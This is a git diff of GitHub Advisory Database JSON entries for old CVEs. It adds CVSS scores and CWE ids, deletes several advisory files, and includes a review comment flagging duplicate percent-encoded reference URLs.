 "details": "Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a \"Movie Unloading Vulnerability.\"",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -45,7 +48,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-r9vw-px66-gx7g/GHSA-r9vw-px66-gx7g.json b/advisories/unreviewed/2022/05/GHSA-r9vw-px66-gx7g/GHSA-r9vw-px66-gx7g.json
index ac00f0ec36c1f..22c6ae70d5e2d 100644
--- a/advisories/unreviewed/2022/05/GHSA-r9vw-px66-gx7g/GHSA-r9vw-px66-gx7g.json
+++ b/advisories/unreviewed/2022/05/GHSA-r9vw-px66-gx7g/GHSA-r9vw-px66-gx7g.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r9vw-px66-gx7g",
- "modified": "2022-05-01T02:01:33Z",
+ "modified": "2024-02-08T21:30:31Z",
 "published": "2022-05-01T02:01:33Z",
 "aliases": [
 "CVE-2005-1744"
 ],
 "details": "BEA WebLogic Server and WebLogic Express 7.0 through Service Pack 5 does not log out users when an application is redeployed, which allows those users to continue to access the application without having to log in again, which may be in violation of newly changed security constraints or role mappings.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -41,7 +44,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-459"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json b/advisories/unreviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json
deleted file mode 100644
index 8ed4175b77f22..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-rcrv-6r7r-rr7m",
- "modified": "2022-05-13T01:17:45Z",
- "published": "2022-05-13T01:17:45Z",
- "aliases": [
- "CVE-2019-1003059"
- ],
- "details": "A missing permission check in Jenkins FTP publisher Plugin in the FTPPublisher.DescriptorImpl#doLoginCheck method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003059"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-974"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-rfj9-gw43-8w26/GHSA-rfj9-gw43-8w26.json b/advisories/unreviewed/2022/05/GHSA-rfj9-gw43-8w26/GHSA-rfj9-gw43-8w26.json
index 2970bf1ac5fa4..5c3eca3a9da71 100644
--- a/advisories/unreviewed/2022/05/GHSA-rfj9-gw43-8w26/GHSA-rfj9-gw43-8w26.json
+++ b/advisories/unreviewed/2022/05/GHSA-rfj9-gw43-8w26/GHSA-rfj9-gw43-8w26.json
@@ -29,7 +29,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-770"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-rpcf-xw9j-7c7j/GHSA-rpcf-xw9j-7c7j.json b/advisories/unreviewed/2022/05/GHSA-rpcf-xw9j-7c7j/GHSA-rpcf-xw9j-7c7j.json
index c70adf20e56f1..3a72edc466bd1 100644
--- a/advisories/unreviewed/2022/05/GHSA-rpcf-xw9j-7c7j/GHSA-rpcf-xw9j-7c7j.json
+++ b/advisories/unreviewed/2022/05/GHSA-rpcf-xw9j-7c7j/GHSA-rpcf-xw9j-7c7j.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rpcf-xw9j-7c7j",
- "modified": "2022-05-17T01:59:37Z",
+ "modified": "2024-02-02T15:30:27Z",
 "published": "2022-05-17T01:59:37Z",
 "aliases": [
 "CVE-2011-1755"
 ],
 "details": "jabberd2 before 2.2.14 does not properly detect recursion during entity expansion, which allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted XML document containing a large number of nested entity references, a similar issue to CVE-2003-1564.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
 
@@ -66,6 +69,10 @@
 "type": "WEB",
 "url": "http://support.apple.com/kb/HT5002"
 },
+ {
+ "type": "WEB",
+ "url": "http://www.mail-archive.com/jabberd2%40lists.xiaoka.com/msg01655.html"
+ },
 {
 "type": "WEB",
 "url": "http://www.mail-archive.com/jabberd2@lists.xiaoka.com/msg01655.html"
@@ -85,7 +92,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-776"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json b/advisories/unreviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json
deleted file mode 100644
index 374f91132c597..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json
+++ /dev/null
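Review bot: The reference added in the `@@ -66,6 +69,10 @@` hunk of GHSA-rpcf-xw9j-7c7j, `http://www.mail-archive.com/jabberd2%40lists.xiaoka.com/msg01655.html`, points at the same resource as the existing entry three lines below, differing only in `@` being percent-encoded as `%40`, so the advisory now carries a duplicate reference. Consumers that deduplicate references by exact string will surface both; normalizing the URL before insertion (or dropping the encoded variant) keeps the list stable. The same percent-encoded duplicates are introduced for the chromium.org commit URL in GHSA-vxj5-2742-4q53 (`%3B` for `;`) and the bkbits URL in GHSA-w3j5-qjf6-g9gf (`%40` for `@`).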
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-rv74-mh27-4jpv",
- "modified": "2022-05-24T17:36:09Z",
- "published": "2022-05-24T17:36:09Z",
- "aliases": [
- "CVE-2020-7790"
- ],
- "details": "This affects the package spatie/browsershot from 0.0.0. By specifying a URL in the file:// protocol an attacker is able to include arbitrary files in the resultant PDF.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7790"
- },
- {
- "type": "WEB",
- "url": "https://github.com/spatie/browsershot/issues/441%23issue-735049731"
- },
- {
- "type": "WEB",
- "url": "https://snyk.io/vuln/SNYK-PHP-SPATIEBROWSERSHOT-1037064"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-22"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-12-11T11:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-rvgj-fpwg-2m28/GHSA-rvgj-fpwg-2m28.json b/advisories/unreviewed/2022/05/GHSA-rvgj-fpwg-2m28/GHSA-rvgj-fpwg-2m28.json
index 83ea552b95c12..d7c98ae951df1 100644
--- a/advisories/unreviewed/2022/05/GHSA-rvgj-fpwg-2m28/GHSA-rvgj-fpwg-2m28.json
+++ b/advisories/unreviewed/2022/05/GHSA-rvgj-fpwg-2m28/GHSA-rvgj-fpwg-2m28.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rvgj-fpwg-2m28",
- "modified": "2022-05-01T07:41:49Z",
+ "modified": "2024-02-08T03:32:44Z",
 "published": "2022-05-01T07:41:49Z",
 "aliases": [
 "CVE-2006-6811"
 ],
 "details": "KsIRC 1.3.12 allows remote attackers to cause a denial of service (crash) via a long PRIVMSG string when connecting to an Internet Relay Chat (IRC) server, which causes an assertion failure and results in a NULL pointer dereference. NOTE: this issue was originally reported as a buffer overflow.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
 
@@ -73,7 +76,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-617"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json b/advisories/unreviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json
deleted file mode 100644
index 44b2c1c98f194..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-rxph-cq38-gm3g",
- "modified": "2023-10-25T18:31:32Z",
- "published": "2022-05-24T17:03:48Z",
- "aliases": [
- "CVE-2019-16568"
- ],
- "details": "Jenkins SCTMExecutor Plugin 2.2 and earlier transmits previously configured service credentials in plain text as part of the global configuration, as well as individual jobs' configurations.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16568"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1521"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-319"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-12-17T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json b/advisories/unreviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json
deleted file mode 100644
index f9a6d569878c6..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json
+++ /dev/null
@@ -1,59 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-v2c9-9m8v-8jjm",
- "modified": "2022-05-14T02:45:01Z",
- "published": "2022-05-14T02:45:01Z",
- "aliases": [
- "CVE-2010-1587"
- ],
- "details": "The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1587"
- },
- {
- "type": "WEB",
- "url": "https://issues.apache.org/activemq/browse/AMQ-2700"
- },
- {
- "type": "WEB",
- "url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0278.html"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/39567"
- },
- {
- "type": "WEB",
- "url": "http://www.osvdb.org/64020"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/archive/1/510896/100/0/threaded"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/39636"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2010/0979"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-20"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-04-28T22:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json b/advisories/unreviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json
deleted file mode 100644
index e447fc97e0b4c..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json
+++ /dev/null
@@ -1,59 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-v2cv-wwxq-qq97",
- "modified": "2022-05-24T16:51:39Z",
- "published": "2022-05-24T16:51:39Z",
- "aliases": [
- "CVE-2019-14271"
- ],
- "details": "In Docker 19.03.x before 19.03.1 linked against the GNU C Library (aka glibc), code injection can occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the container.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14271"
- },
- {
- "type": "WEB",
- "url": "https://github.com/moby/moby/issues/39449"
- },
- {
- "type": "WEB",
- "url": "https://docs.docker.com/engine/release-notes/"
- },
- {
- "type": "WEB",
- "url": "https://seclists.org/bugtraq/2019/Sep/21"
- },
- {
- "type": "WEB",
- "url": "https://security.netapp.com/advisory/ntap-20190828-0003/"
- },
- {
- "type": "WEB",
- "url": "https://www.debian.org/security/2019/dsa-4521"
- },
- {
- "type": "WEB",
- "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00084.html"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-665",
- "CWE-94"
- ],
- "severity": "CRITICAL",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-07-29T18:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json b/advisories/unreviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json
deleted file mode 100644
index 03a3218f0cebe..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-vc2v-34c4-vg9c/GHSA-vc2v-34c4-vg9c.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-vc2v-34c4-vg9c",
- "modified": "2022-05-13T01:17:42Z",
- "published": "2022-05-13T01:17:42Z",
- "aliases": [
- "CVE-2019-1003088"
- ],
- "details": "Jenkins Fabric Beta Publisher Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003088"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1043"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-311"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json b/advisories/unreviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json
deleted file mode 100644
index 9b3f604c00778..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-vcgj-j8c5-2h52/GHSA-vcgj-j8c5-2h52.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-vcgj-j8c5-2h52",
- "modified": "2022-05-13T01:36:52Z",
- "published": "2022-05-13T01:36:52Z",
- "aliases": [
- "CVE-2017-2649"
- ],
- "details": "It was found that the Active Directory Plugin for Jenkins up to and including version 2.2 did not verify certificates of the Active Directory server, thereby enabling Man-in-the-Middle attacks.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2649"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-03-20/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/96986"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-295"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-07-27T20:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json b/advisories/unreviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json
deleted file mode 100644
index c313827b96c7a..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-vf2c-w49g-3xf3/GHSA-vf2c-w49g-3xf3.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-vf2c-w49g-3xf3",
- "modified": "2023-10-25T18:31:25Z",
- "published": "2022-05-24T16:52:46Z",
- "aliases": [
- "CVE-2019-10387"
- ],
- "details": "A missing permission check in Jenkins XL TestView Plugin 1.2.0 and earlier in XLTestView.XLTestDescriptor#doTestConnection allows users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10387"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1008"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-08-07T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-vfq3-4hcr-qmqp/GHSA-vfq3-4hcr-qmqp.json b/advisories/unreviewed/2022/05/GHSA-vfq3-4hcr-qmqp/GHSA-vfq3-4hcr-qmqp.json
index 06be2f4defcd9..8d589ec09223a 100644
--- a/advisories/unreviewed/2022/05/GHSA-vfq3-4hcr-qmqp/GHSA-vfq3-4hcr-qmqp.json
+++ b/advisories/unreviewed/2022/05/GHSA-vfq3-4hcr-qmqp/GHSA-vfq3-4hcr-qmqp.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vfq3-4hcr-qmqp",
- "modified": "2022-05-24T19:05:20Z",
+ "modified": "2024-01-31T21:31:02Z",
 "published": "2022-05-24T19:05:20Z",
 "aliases": [
 "CVE-2020-29215"
 ],
 "details": "A Cross Site Scripting in SourceCodester Employee Management System 1.0 allows the user to execute alert messages via /Employee Management System/addemp.php on admin account.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
 
diff --git a/advisories/unreviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json b/advisories/unreviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json
deleted file mode 100644
index 5346d799e86ab..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-vhh3-mvc4-hhq6/GHSA-vhh3-mvc4-hhq6.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-vhh3-mvc4-hhq6",
- "modified": "2022-05-13T01:18:20Z",
- "published": "2022-05-13T01:18:20Z",
- "aliases": [
- "CVE-2017-1000388"
- ],
- "details": "Jenkins Dependency Graph Viewer plugin 0.12 and earlier did not perform permission checks for the API endpoint that modifies the dependency graph, allowing anyone with Overall/Read permission to modify this data.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000388"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-10-23/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-01-26T02:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-vm5j-fpc2-73xx/GHSA-vm5j-fpc2-73xx.json b/advisories/unreviewed/2022/05/GHSA-vm5j-fpc2-73xx/GHSA-vm5j-fpc2-73xx.json
index 927f0bd29660c..ae735adaa9e79 100644
--- a/advisories/unreviewed/2022/05/GHSA-vm5j-fpc2-73xx/GHSA-vm5j-fpc2-73xx.json
+++ b/advisories/unreviewed/2022/05/GHSA-vm5j-fpc2-73xx/GHSA-vm5j-fpc2-73xx.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vm5j-fpc2-73xx",
- "modified": "2022-05-02T03:48:18Z",
+ "modified": "2024-02-08T21:30:31Z",
 "published": "2022-05-02T03:48:18Z",
 "aliases": [
 "CVE-2009-3759"
 ],
 "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in sample code in the XenServer Resource Kit in Citrix XenCenterWeb allow remote attackers to hijack the authentication of administrators for (1) requests that change the password via the username parameter to config/changepw.php or (2) stop a virtual machine via the stop_vmname parameter to hardstopvm.php. NOTE: some of these details are obtained from third party information.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
diff --git a/advisories/unreviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json b/advisories/unreviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json
deleted file mode 100644
index 9d705ae556bc3..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-vrh7-99jh-3fmm/GHSA-vrh7-99jh-3fmm.json
+++ /dev/null
@@ -1,63 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-vrh7-99jh-3fmm",
- "modified": "2022-05-02T06:10:33Z",
- "published": "2022-05-02T06:10:33Z",
- "aliases": [
- "CVE-2010-0156"
- ],
- "details": "Puppet 0.24.x before 0.24.9 and 0.25.x before 0.25.2 allows local users to overwrite arbitrary files via a symlink attack on the (1) /tmp/daemonout, (2) /tmp/puppetdoc.txt, (3) /tmp/puppetdoc.tex, or (4) /tmp/puppetdoc.aux temporary file.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-0156"
- },
- {
- "type": "WEB",
- "url": "https://bugzilla.redhat.com/show_bug.cgi?id=502881"
- },
- {
- "type": "WEB",
- "url": "https://puppet.com/security/cve/cve-2010-0156"
- },
- {
- "type": "WEB",
- "url": "http://groups.google.com/group/puppet-announce/browse_thread/thread/4401823f6cbf6087"
- },
- {
- "type": "WEB",
- "url": "http://groups.google.com/group/puppet-announce/browse_thread/thread/73cd1b2896d986c2"
- },
- {
- "type": "WEB",
- "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036083.html"
- },
- {
- "type": "WEB",
- "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036166.html"
- },
- {
- "type": "WEB",
- "url": "http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/38766"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-59"
- ],
- "severity": "LOW",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-03-03T19:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json b/advisories/unreviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json
deleted file mode 100644
index 849290edf5e76..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-vv4q-2w98-4v8g/GHSA-vv4q-2w98-4v8g.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-vv4q-2w98-4v8g",
- "modified": "2023-03-01T03:30:29Z",
- "published": "2022-05-24T22:00:44Z",
- "aliases": [
- "CVE-2019-10427"
- ],
- "details": "Jenkins Aqua MicroScanner Plugin 1.0.7 and earlier transmitted configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10427"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1507"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-319"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-09-25T16:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json b/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json
index 93a4d90a39edb..e48e7276f0966 100644
--- a/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json
+++ b/advisories/unreviewed/2022/05/GHSA-vw3x-5825-83ph/GHSA-vw3x-5825-83ph.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vw3x-5825-83ph",
- "modified": "2022-05-02T06:20:12Z",
+ "modified": "2024-02-02T18:30:22Z",
 "published": "2022-05-02T06:20:12Z",
 "aliases": [
 "CVE-2010-1208"
 ],
 "details": "Use-after-free vulnerability in the attribute-cloning functionality in the DOM implementation in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, and SeaMonkey before 2.0.6, allows remote attackers to execute arbitrary code via vectors related to deletion of an event attribute node with a nonzero reference count.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -45,7 +48,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-vxj5-2742-4q53/GHSA-vxj5-2742-4q53.json b/advisories/unreviewed/2022/05/GHSA-vxj5-2742-4q53/GHSA-vxj5-2742-4q53.json
index e2e2e3e370bb8..a4948ed6ffe36 100644
--- a/advisories/unreviewed/2022/05/GHSA-vxj5-2742-4q53/GHSA-vxj5-2742-4q53.json
+++ b/advisories/unreviewed/2022/05/GHSA-vxj5-2742-4q53/GHSA-vxj5-2742-4q53.json
@@ -34,6 +34,10 @@
 "type": "WEB",
 "url": "https://lkml.org/lkml/2013/3/11/501"
 },
+ {
+ "type": "WEB",
+ "url": "http://git.chromium.org/gitweb/?p=chromiumos/third_party/kernel.git%3Ba=commit%3Bh=c79efdf2b7f68f985922a8272d64269ecd490477"
+ },
 {
 "type": "WEB",
